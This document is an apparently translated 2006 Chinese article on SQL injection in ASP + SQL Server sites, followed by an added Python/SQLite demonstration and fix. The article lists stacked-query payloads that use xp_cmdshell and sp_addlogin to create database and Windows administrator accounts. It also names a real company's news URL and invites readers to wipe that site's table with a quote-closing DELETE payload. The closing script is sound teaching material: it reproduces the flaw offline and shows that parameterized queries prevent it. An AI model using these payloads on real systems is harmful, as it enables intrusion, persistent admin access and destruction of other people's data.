A simple database intrusion and wanton damage: vulnerability warning (黑吧安全网)

ID MYHACK58:62200613481
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-12-29T00:00:00


A great many news sites, BBSes and e-commerce sites, at home and abroad, are built on ASP + SQL Server, and many of the programmers writing the ASP have only just graduated, so attacks against ASP + SQL have a fairly high success rate. This attack method has little to do with the NT version or the SQL Server version, and there is no patch for it: the hole is created by the programmers themselves, and most ASP tutorials, books and sample code carry it. Every request is perfectly legal SQL; the application simply leaves the door open.

The method grew out of the ' or '1'='1 hole (let's just call it "the vulnerability"). Everyone already knows how that one works, so the natural next step is ;exec sp_addlogin hax, which adds a login named hax to the database. That has two big restrictions. First, the SQL Server account the ASP connects with has to be an administrator (sysadmin). Second, the submitted variable has to sit at the very end of the SQL statement, because some programmers query the database like this:

    SELECT * FROM news WHERE id=... AND topic=... AND ...

With that shape, the request

    news.asp?id=2;exec sp_addlogin hax

becomes

    SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ...

The stored-procedure call is followed by the rest of the WHERE clause, which is a syntax error, so sp_addlogin never runs. Try this instead:

    news.asp?id=2;exec sp_addlogin hax;--

The -- turns everything after sp_addlogin into a comment, there is no syntax error, and sp_addlogin executes normally. Now chain the requests together:

    news.asp?id=2;exec master.dbo.sp_addlogin hax;--
    news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--
    news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--

(One caveat on the third line: the documented parameter order is sp_addsrvrolemember 'hax', 'sysadmin', login first and then role, and the two arguments must be separated by a comma; written as above the call does not parse.)

After this you have left an administrator account named hax both in the database and on the operating system. The prerequisite, again, is that the ASP connects with an administrator account, so there is no point trying this on shared virtual hosting, where that condition does not hold. Later we will discuss how to get in when the ASP does not use the SQL administrator account; that is also related to intrusion over port 1433. Everyone can also try appending a ' to id=2, mainly to see how the other side's ASP is written.

Now for what to do when the ASP uses an ordinary SQL account instead of the administrator. Take the 天财信 (talentit) homepage as an example; it has a news section: http://www.talentit.com.cn/news/news-2.asp?newid=117 Everyone can try it. http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;-- Oh, the page reports a syntax error, the select 123 fails; obviously in talentit's ASP the newid variable is followed by a ' that our input has not closed. So try http://www.talentit.com.cn/news/news-2.asp?newid=117';delete news;-- Haha, I think as long as the table name is guessed right, the news table is wiped. Note that nothing here needs sysadmin: DELETE on the news table is a permission the web application's own account almost always has, which is exactly why a low-privilege account is no protection against this kind of damage.
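The mechanics described above, both the stacked statement with a trailing AND clause versus the ;-- terminator (the news.asp?id=2 example) and the quoted newid context where the quote must be closed first (the talentit example), can be reproduced offline. The following is an added example written for this page, not code from the original article or from any of the sites it mentions. It uses SQLite rather than SQL Server, so sp_addlogin and xp_cmdshell are out of scope; what it shows is the injection itself: how the concatenated query text changes, which payloads fail with a syntax error, and which ones reach the DELETE. The table name news is taken from the page; the columns id and topic, the sample rows and the two query templates are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the site's news table. The column
# names (id, topic) are assumptions; the page never shows the real schema.
SEED_ROWS = [(1, "tech"), (2, "tech"), (3, "sport")]

# Two shapes of the vulnerable ASP query described on the page: the id pasted
# in unquoted with a further AND clause after it, and the id wrapped in quotes.
TEMPLATE_UNQUOTED = "SELECT * FROM news WHERE id={v} AND topic='tech'"
TEMPLATE_QUOTED = "SELECT * FROM news WHERE id='{v}'"


def fresh_db():
    """Return an in-memory SQLite database holding the constructed news table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, topic TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", SEED_ROWS)
    con.commit()
    return con


def run_vulnerable(template, user_value):
    """Mimic the vulnerable ASP: splice the request value into the SQL text and
    run it with executescript(), which (like SQL Server) executes every
    ';'-separated statement in the string. Returns (sql, error, rows_left)."""
    con = fresh_db()
    sql = template.format(v=user_value)
    error = None
    try:
        con.executescript(sql)
    except sqlite3.Error as exc:
        error = str(exc)
    rows_left = con.execute("SELECT COUNT(*) FROM news").fetchone()[0]
    con.close()
    return sql, error, rows_left


def run_parameterized(user_value):
    """The fix: bind the value as a parameter. Whatever it contains is compared
    against id as data; no second statement can be smuggled in.
    Returns (matching_rows, rows_left)."""
    con = fresh_db()
    matches = con.execute("SELECT * FROM news WHERE id=?", (user_value,)).fetchall()
    rows_left = con.execute("SELECT COUNT(*) FROM news").fetchone()[0]
    con.close()
    return len(matches), rows_left


if __name__ == "__main__":
    cases = [
        # Stacked statement with the trailing AND still attached: syntax error,
        # nothing deleted. This is the failure the page describes.
        (TEMPLATE_UNQUOTED, "2;DELETE FROM news"),
        # '--' comments out the rest of the line, so the stacked DELETE runs.
        (TEMPLATE_UNQUOTED, "2;DELETE FROM news;--"),
        # Quoted context: without a closing quote the payload is just a string.
        (TEMPLATE_QUOTED, "117;DELETE FROM news;--"),
        # Close the quote first and the same trick works (the page's newid case).
        (TEMPLATE_QUOTED, "117';DELETE FROM news;--"),
    ]
    for template, value in cases:
        sql, error, left = run_vulnerable(template, value)
        print(f"{sql}\n  -> error={error!r} rows_left={left}")
    print("parameterized:", run_parameterized("2;DELETE FROM news;--"))
```

The first case is the one the page warns about: with AND topic=... still glued to the end, the stacked DELETE does not parse and the table survives. Appending ;-- fixes that for the attacker, and in the quoted template a leading ' is needed before the same payload works. The parameterized query treats the whole payload as a value to compare against id, returns no rows and deletes nothing, which is the only real remedy; running the web application as a non-administrator account, as the page's second section shows, still leaves DELETE on the table.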